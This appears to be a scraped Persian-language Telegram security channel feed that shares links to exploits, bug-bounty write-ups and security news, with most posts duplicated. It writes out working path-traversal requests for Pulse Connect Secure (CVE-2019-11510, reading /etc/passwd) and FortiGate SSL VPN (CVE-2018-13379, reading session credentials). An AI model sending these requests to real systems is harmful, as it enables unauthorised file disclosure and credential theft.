Webmin 1.890 expired Remote Root
https://packetstormsecurity.com/files/154220/webmin1890expired-remoteroot.txt
#webmin
#exploit
#web
#pentest
#perl
@sec_nerd
https://packetstormsecurity.com/files/154220/webmin1890expired-remoteroot.txt
#webmin
#exploit
#web
#pentest
#perl
@sec_nerd
Packetstormsecurity
Webmin 1.890 expired Remote Root ≈ Packet Storm
Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers
RCE as root on Marathon-Mesos instance
https://omespino.com/write-up-private-bug-bounty-usd-rce-as-root-on-marathon-instance/
#writeup
#web
#pentest
#bugbounty
@sec_nerd
https://omespino.com/write-up-private-bug-bounty-usd-rce-as-root-on-marathon-instance/
#writeup
#web
#pentest
#bugbounty
@sec_nerd
رایت آپ
XSS to XXE
https://www.corben.io/XSS-to-XXE-in-Prince/
#writeup
#bugbounty
#web
#pentest
@sec_nerd
XSS to XXE
https://www.corben.io/XSS-to-XXE-in-Prince/
#writeup
#bugbounty
#web
#pentest
@sec_nerd
امن ترین پیام رسانها از نگاه engadget
۱- سیگنال (امن ترین پیام رسان، چت های رمزنگاری شده بصورت پیشفرض و پیشنهاد کارشناسانی چون ادوارد اسنودن)
۲- تلگرام (رمزنگاری مخصوص و امکان حذف پیام های خود و طرف مقابل)
۳- واتس اپ (رمزنگاری با فناوری سیگنال)
۴- فیسبوک مسنجر (عدم نیاز به شماره تلفن و امکان رمزنگاری با فناوری سیگنال)
https://www.engadget.com/2019/08/28/the-best-encrypted-messaging-apps/
#telegram
#whatsapp
#signal
#facebook
@sec_nerd
۱- سیگنال (امن ترین پیام رسان، چت های رمزنگاری شده بصورت پیشفرض و پیشنهاد کارشناسانی چون ادوارد اسنودن)
۲- تلگرام (رمزنگاری مخصوص و امکان حذف پیام های خود و طرف مقابل)
۳- واتس اپ (رمزنگاری با فناوری سیگنال)
۴- فیسبوک مسنجر (عدم نیاز به شماره تلفن و امکان رمزنگاری با فناوری سیگنال)
https://www.engadget.com/2019/08/28/the-best-encrypted-messaging-apps/
#telegram
#signal
@sec_nerd
Engadget
The safest messaging apps
How to navigate the trade-offs between security, convenience and reach.
امنیت اطلاعات
Pulse Connect Secure versions 9.0RX, 8.3RX, and 8.2RX arbitrary file disclosure CVE-2019-11510 exploit: /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://www.exploit-db.com/exploits/47297 #pulse #vpn…
This media is not supported in your browser
VIEW IN TELEGRAM
مجموعه گزارشات مربوط به سیستم عامل اندروید در وبسایت Hackerone.com
https://github.com/B3nac/Android-Reports-and-Resources
#bugbounty
#android
@sec_nerd
https://github.com/B3nac/Android-Reports-and-Resources
#bugbounty
#android
@sec_nerd
GitHub
GitHub - B3nac/Android-Reports-and-Resources: A big list of Android Hackerone disclosed reports and other resources.
A big list of Android Hackerone disclosed reports and other resources. - GitHub - B3nac/Android-Reports-and-Resources: A big list of Android Hackerone disclosed reports and other resources.
CVE-2018-13379
https://github.com/milo2012/CVE-2018-13379
fortiGate SSL VPN
GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
#fortigate
#fortiOS
#firewall
#vpn
@sec_nerd
https://github.com/milo2012/CVE-2018-13379
fortiGate SSL VPN
GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
#fortigate
#fortiOS
#firewall
#vpn
@sec_nerd
GitHub
GitHub - milo2012/CVE-2018-13379: CVE-2018-13379
CVE-2018-13379. Contribute to milo2012/CVE-2018-13379 development by creating an account on GitHub.
سرورهای Foxit توسط هکرها مورد نفوذ قرار گرفتند!
در این حمله جزییات اطلاعات کاربران نظیر ایمیل، پسورد، شماره تلفن، نام کاربری و نام شرکت و آدرس آی پی به سرقت رفته است.
https://www.foxitsoftware.com/support/security-advisories.php
#breach
#news
#foxit
@sec_nerd
در این حمله جزییات اطلاعات کاربران نظیر ایمیل، پسورد، شماره تلفن، نام کاربری و نام شرکت و آدرس آی پی به سرقت رفته است.
https://www.foxitsoftware.com/support/security-advisories.php
#breach
#news
#foxit
@sec_nerd
Foxit
Cybersecurity Advisory Notice | Foxit Software
To check security advisories.
This media is not supported in your browser
VIEW IN TELEGRAM
استخراج پسوردهای سیستم عامل ویندوز
https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/
#windows
#enum
#privesc
@sec_nerd
https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/
#windows
#enum
#privesc
@sec_nerd
پس از گذشت چند سال از نفوذ ویروس استاکس نت در سایت هسته ای نطنز، اخیرا مشخص شد که انتقال اطلاعات به سرویس های جاسوسی امریکا و اسراییل توسط سرویس جاسوسی هلند انجام شد!
سرویس جاسوسی هلند با کمک یک فرد ایرانی که در این سایت نقش مکانیک را داشت، با دستور موساد و سیا اطلاعات داخلی سایت را از سال ۲۰۰۴ جمع آوری کرد تا ویروس را بصورت هدفمند طراحی کند. در ادامه این فرد انتقال ویروس به داخل سیستم های سایت نطنز با استفاده از یک فلش را نیز انجام داد.
منبع:
https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html?soc_src=community&soc_trk=tw
#news
#iran
#usa
#israel
#stuxnet
#germany
@sec_nerd
سرویس جاسوسی هلند با کمک یک فرد ایرانی که در این سایت نقش مکانیک را داشت، با دستور موساد و سیا اطلاعات داخلی سایت را از سال ۲۰۰۴ جمع آوری کرد تا ویروس را بصورت هدفمند طراحی کند. در ادامه این فرد انتقال ویروس به داخل سیستم های سایت نطنز با استفاده از یک فلش را نیز انجام داد.
منبع:
https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html?soc_src=community&soc_trk=tw
#news
#iran
#usa
#israel
#stuxnet
#germany
@sec_nerd
Yahoo
Revealed: How a secret Dutch mole aided the U.S.-Israeli Stuxnet cyberattack on Iran
For years, an enduring mystery has surrounded the Stuxnet virus attack that targeted Iran’s nuclear program: How did the U.S. and Israel get their malware onto computer systems at the highly secured uranium-enrichment plant?
امنیت اطلاعات
Pulse Connect Secure versions 9.0RX, 8.3RX, and 8.2RX arbitrary file disclosure CVE-2019-11510 exploit: /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://www.exploit-db.com/exploits/47297 #pulse #vpn…
https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
#pulse
#vpn
#lfd
@sec_nerd
#pulse
#vpn
#lfd
@sec_nerd
Orange Tsai
Attacking SSL VPN - Part 3: The Golden Pulse Secure SSL VPN RCE Chain, with Twitter as Case Study!
Author: Orange Tsai(@orange_8361) and Meh Chang(@mehqq_) Hi, this is the last part of Attacking SSL VPN series. If you haven’t read previous articles yet, here are the quick links for you: Infi
Bitbucket 6.1.1 Path Traversal to RCE
https://blog.ripstech.com/2019/bitbucket-path-traversal-to-rce/
#web
#exploit
@sec_nerd
https://blog.ripstech.com/2019/bitbucket-path-traversal-to-rce/
#web
#exploit
@sec_nerd
Sonarsource
Sonar Blog for Clean Code
Sonar is the home of Clean Code. Our blog showcases our products: SonarLint, SonarQube, and SonarCloud - trusted by 400k+ organizations globally.
پرداخت های جدید zerodium برای باگ های تلفن های همراه.
۲/۵ میلیون دلار برای باگ اندرویدی (آلوده سازی کامل بدون اطلاع و با کمترین دخالت کاربر)
https://zerodium.com/program.html#changelog
#news
#mobile
#zerodium
@sec_nerd
۲/۵ میلیون دلار برای باگ اندرویدی (آلوده سازی کامل بدون اطلاع و با کمترین دخالت کاربر)
https://zerodium.com/program.html#changelog
#news
#mobile
#zerodium
@sec_nerd
امنیت اطلاعات
Pulse Connect Secure versions 9.0RX, 8.3RX, and 8.2RX arbitrary file disclosure CVE-2019-11510 exploit: /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://www.exploit-db.com/exploits/47297 #pulse #vpn…
https://github.com/r00tpgp/http-pulse_ssl_vpn.nse
اسکریپت nmap برای تشخیص سرورهای آسیب پذیر در برابر این حمله
#pulse
#vpn
#lfd
@sec_nerd
اسکریپت nmap برای تشخیص سرورهای آسیب پذیر در برابر این حمله
#pulse
#vpn
#lfd
@sec_nerd
GitHub
GitHub - r00tpgp/http-pulse_ssl_vpn.nse: Nmap NSE script to detect Pulse Secure SSL VPN file disclosure CVE-2019-11510
Nmap NSE script to detect Pulse Secure SSL VPN file disclosure CVE-2019-11510 - r00tpgp/http-pulse_ssl_vpn.nse